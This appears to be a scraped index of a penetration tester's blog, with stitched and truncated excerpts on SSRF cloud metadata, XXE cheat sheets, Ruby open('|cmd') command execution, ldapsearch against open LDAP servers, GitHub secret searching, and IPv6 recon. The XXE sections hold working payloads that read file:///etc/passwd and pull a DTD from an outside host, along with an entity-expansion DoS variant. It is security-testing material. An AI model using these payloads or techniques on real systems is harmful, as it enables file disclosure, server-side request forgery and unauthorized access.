I landed the SSRF Cloud Metadata technique in a few different scenarios recently. If you haven’t seen the talk BHUSA 2014 - Bringing a Machete to the Amazon I recommend it.

To make life a little easier created a living URL list for Metadata broken down by cloud. There are a few more than he discusses in the talk but still has work to go. Submit a PR if you see some missing.

An XML Entity testing cheatsheet. This is an updated version with nokogiri tests removed, just (X)XE notes.

XML Declaration(s):

1
2

<?xml version="1.0" standalone="no"?>
<?xml version="1.0" standalone="yes"?>

Vanilla entity test:

1

<!DOCTYPE root [<!ENTITY post "1">]><root>&post;</root>

SYSTEM entity test (xxe):

1

<!DOCTYPE root [<!ENTITY post SYSTEM "file:///etc/passwd">]>

Parameter Entity. One of the benefits is a paremeter entity is automatically expanded inside the DOCTYPE:

1
2
3
4

<!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://[IP]/some.dtd">%dtd]>

Should be illegal per XML specs but I've seen it work, also useful for DoS:
<!DOCTYPE root [<!ENTITY % dtd SYSTEM "http://[IP]/some.dtd"><!ENTITY % a "test %dtd">]>

Combined Entity and Parameter Entity:

Last month at Blackhat Arsenal 2015, Pete and I presented on Serpico. This was our second time at Arsenal. Yet again, awesome people, great venue, and overall a highlight for me of BH/DC/LV. We got some excellent feedback on the project, so thank you to anyone who stopped by.

Last year I posted the top 3 feature requests and we squashed them (woot!). These are requested features/bugs this year and their associated issue on github:

I was researching something else and thought this was a cool way to execute a command through the open method in ruby:

1

open("|[CMD]")

The key is starting the open with pipe. For example,

1

open("|ls")

Or to exec and print the result in one line:

1

open("|ls").each {|out| puts out }

Not sure where I saw it originally, but this is an interesting older read: https://devver.wordpress.com/2009/06/30/a-dozen-or-so-ways-to-start-sub-processes-in-ruby-part-1/

OXML is a common document format; think docx (Microsoft Word Document), pptx (Microsoft Powerpoint), xlsx (Excel Spreadsheet), etc.

An OXML document is a zip file containing XML files and any media files. When the document is rendered, the rendering library unzips the document and then parses the containing XML files. The order the XML files are parsed and which files maintain precedence over the others is dependent on the type of document. The following link is from Microsoft on the XML structure in Office 2007 files: File format structure

I seem to find open LDAP servers on the Internet more often than I should. Here are some notes on using ldapsearch

Installing ldapsearch on Ubuntu

1

apt-get install ldap-utils

Root-DSE object

nmap includes a script to gather info from a LDAP root-dse object (http://nmap.org/nsedoc/scripts/ldap-rootdse.html). We can also use ldapsearch to test:

1

ldapsearch -p [PORT] -x -b "" -s base 'objectclass=*' -h [IP]

Open LDAP server

Connect to an open LDAP server, john the ripper can be used to crack passwords that are returned:

gumbler is a script I wrote to search through git commits and introduced in the blog post “Searching Through Git Commits”. Recently I wanted to run Gumbler across all repositories for an organization, the steps are discussed below.

First, we need to grab a list of repositories for the ORG. This can be done using the API

1
2
3

curl "https://api.github.com/orgs/[ORG NAME]/repos?page=1&per_page=10000" > repos.json
curl "https://api.github.com/orgs/[ORG NAME]/repos?page=2&per_page=10000" >> repos.json
...

Note, the API limits the number of values returned so you will want to update the page count to make sure you get them all.

gumbler is a script I wrote to search through git commits. Examples from github are discussed below.

.gitignore

A gitignore file is used to specify files that should not be tracked by git (source gitignore). In the default case, gumbler will read the gitignore file for the project and search every revision for a case where a file from gitignore was committed. Possible use cases would be as a pen tester looking for reconnaisance data (e.g. developer usernames/passwords, staging hosts/services, etc.) or a developer to verify projects did not previously commit “secret” data.

An XML Entity testing cheatsheet. Testing was done using an older vulnerable version of nokogiri. In IRB you can require previous versions of gems. Certain techniques (e.g. XInclude) may require additional settings in Nokogiri.

XML Headers:

1
2

<?xml version="1.0" standalone="no"?>
<?xml version="1.0" standalone="yes"?>

Vanilla entity test:

1

<!DOCTYPE root [<!ENTITY post "1">]><root>&post;</root>

SYSTEM entity test (xxe):

1
2
3
4

<!DOCTYPE root [<!ENTITY post SYSTEM "file:///etc/passwd">]>
e.g.
doc = Nokogiri::XML("<!DOCTYPE root [ <!ENTITY spl SYSTEM \"file:///etc/passwd\"> ]>\n<a>&spl;</a>")
doc.children.children.children.text

Parameter Entity Test. One of the benefits is a paremeter entity is automatically expanded inside the DOCTYPE:

A hostname with an IPv6 address is stored as a AAAA resource record in DNS (see AAAA record). There are many DNS hostname bruteforcing tools, personally I like Fierce. Suppose we have already run our hostname bruteforcing tool against a target domain (e.g. facebook.com). Below we use dig to do a AAAA record lookup for each hostname. Note, the DNS server we use matters. In this example we use 8.8.8.8, to confirm different results try using a.ns.facebook.com instead. Host can also be used instead of dig: